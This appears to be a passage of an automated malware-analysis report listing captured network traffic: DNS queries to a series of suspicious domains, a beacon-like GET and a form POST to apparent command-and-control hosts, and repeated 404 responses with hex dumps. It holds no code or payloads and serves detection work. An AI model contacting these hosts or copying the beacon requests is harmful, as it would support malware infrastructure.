                Source: global trafficHTTP traffic detected: GET /8l49/?u6nP_F48=nvcb/0GPN54d2JGc++8p3dyReVT22F4rjpMi4BWXcGVVoAh+NvljRHAQbHtQixLLlmtkfcmDaBBvdXdVxLFdqzx8TquVI3FC1FmB8VJ2JKjVM5x76R9HEtDUYFAgHCOmYLPQQCg=&F8S0G=ul80rPhxFlR8lH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.beythome.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficDNS traffic detected: DNS query: www.aiactor.xyz
                Source: global trafficDNS traffic detected: DNS query: www.jijievo.site
                Source: global trafficDNS traffic detected: DNS query: www.inspireto.life
                Source: global trafficDNS traffic detected: DNS query: www.717hy.net
                Source: global trafficDNS traffic detected: DNS query: www.bootleggersrt.online
                Source: global trafficDNS traffic detected: DNS query: www.lgdiamonds.info
                Source: global trafficDNS traffic detected: DNS query: www.funnystory.online
                Source: global trafficDNS traffic detected: DNS query: www.614genetics.online
                Source: global trafficDNS traffic detected: DNS query: www.hm35s.top
                Source: global trafficDNS traffic detected: DNS query: www.gravendeel.studio
                Source: global trafficDNS traffic detected: DNS query: www.kvsj.net
                Source: global trafficDNS traffic detected: DNS query: www.beythome.online
                Source: global trafficDNS traffic detected: DNS query: www.theressome123ppl.info
                Source: global trafficDNS traffic detected: DNS query: www.conseilnsaftogo.org
                Source: unknownHTTP traffic detected: POST /k6jo/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Host: www.jijievo.siteContent-Length: 213Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeOrigin: http://www.jijievo.siteReferer: http://www.jijievo.site/k6jo/User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:39:05 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:39:07 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:39:10 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:39:13 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 03 Dec 2024 13:39:20 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniff
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 03 Dec 2024 13:39:23 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniff
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 03 Dec 2024 13:39:25 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniff
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 03 Dec 2024 13:39:28 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniff
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:39:35 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:39:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:39:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:39:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Tue, 03 Dec 2024 13:39:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Tue, 03 Dec 2024 13:39:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Tue, 03 Dec 2024 13:39:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Tue, 03 Dec 2024 13:39:58 GMTContent-Type: text/htmlContent-Length: 168Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:40:43 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a5f968-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:40:45 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a5f968-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:40:48 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a5f968-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:40:55 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: brData Raw: 62 65 0d 0a a1 d0 09 00 20 06 ad ab 6f 49 73 1d 8c 90 23 de 5c 6f 21 77 77 36 48 26 d1 6c 4a f0 f2 bd 09 4d 88 22 4d a6 a7 3e 17 0c eb b2 4b 9a 7e 14 ca c9 ed 66 2c 5c 14 4c 50 b4 56 12 da 58 d4 d8 43 b7 f1 38 51 86 60 3d 8b 2c cf 71 6e 26 79 b0 bf ce 27 6d 5d 04 f3 3d 64 5e 46 76 7d 41 c3 3c a3 16 13 c8 19 67 85 3f 71 dd 09 9a df 73 27 68 44 b9 69 8d ae 43 40 4d 59 af b0 d5 42 be d3 13 97 eb 0b 6d 47 fc f5 01 ed 35 56 e1 6e a1 0c 74 d7 d3 9f c6 84 22 3c e9 1d 92 e5 f5 65 b0 75 bd c2 b3 b1 37 31 e2 fd 5c 63 ba c0 0d 30 58 56 36 8d 2b ae ff 11 ab c3 a3 05 ca de a4 70 43 70 04 0d 0a 30 0d 0a 0d 0a Data Ascii: be oIs#\o!ww6H&lJM"M>K~f,\LPVXC8Q`=,qn&y'm]=d^Fv}A<g?qs'hDiC@MYBmG5Vnt"<eu71\c0XV6+pCp0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:40:58 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: brData Raw: 62 65 0d 0a a1 d0 09 00 20 06 ad ab 6f 49 73 1d 8c 90 23 de 5c 6f 21 77 77 36 48 26 d1 6c 4a f0 f2 bd 09 4d 88 22 4d a6 a7 3e 17 0c eb b2 4b 9a 7e 14 ca c9 ed 66 2c 5c 14 4c 50 b4 56 12 da 58 d4 d8 43 b7 f1 38 51 86 60 3d 8b 2c cf 71 6e 26 79 b0 bf ce 27 6d 5d 04 f3 3d 64 5e 46 76 7d 41 c3 3c a3 16 13 c8 19 67 85 3f 71 dd 09 9a df 73 27 68 44 b9 69 8d ae 43 40 4d 59 af b0 d5 42 be d3 13 97 eb 0b 6d 47 fc f5 01 ed 35 56 e1 6e a1 0c 74 d7 d3 9f c6 84 22 3c e9 1d 92 e5 f5 65 b0 75 bd c2 b3 b1 37 31 e2 fd 5c 63 ba c0 0d 30 58 56 36 8d 2b ae ff 11 ab c3 a3 05 ca de a4 70 43 70 04 0d 0a 30 0d 0a 0d 0a Data Ascii: be oIs#\o!ww6H&lJM"M>K~f,\LPVXC8Q`=,qn&y'm]=d^Fv}A<g?qs'hDiC@MYBmG5Vnt"<eu71\c0XV6+pCp0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:41:01 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: brData Raw: 62 65 0d 0a a1 d0 09 00 20 06 ad ab 6f 49 73 1d 8c 90 23 de 5c 6f 21 77 77 36 48 26 d1 6c 4a f0 f2 bd 09 4d 88 22 4d a6 a7 3e 17 0c eb b2 4b 9a 7e 14 ca c9 ed 66 2c 5c 14 4c 50 b4 56 12 da 58 d4 d8 43 b7 f1 38 51 86 60 3d 8b 2c cf 71 6e 26 79 b0 bf ce 27 6d 5d 04 f3 3d 64 5e 46 76 7d 41 c3 3c a3 16 13 c8 19 67 85 3f 71 dd 09 9a df 73 27 68 44 b9 69 8d ae 43 40 4d 59 af b0 d5 42 be d3 13 97 eb 0b 6d 47 fc f5 01 ed 35 56 e1 6e a1 0c 74 d7 d3 9f c6 84 22 3c e9 1d 92 e5 f5 65 b0 75 bd c2 b3 b1 37 31 e2 fd 5c 63 ba c0 0d 30 58 56 36 8d 2b ae ff 11 ab c3 a3 05 ca de a4 70 43 70 04 0d 0a 30 0d 0a 0d 0a Data Ascii: be oIs#\o!ww6H&lJM"M>K~f,\LPVXC8Q`=,qn&y'm]=d^Fv}A<g?qs'hDiC@MYBmG5Vnt"<eu71\c0XV6+pCp0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:41:03 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:41:10 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:41:13 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:41:16 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:41:18 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not 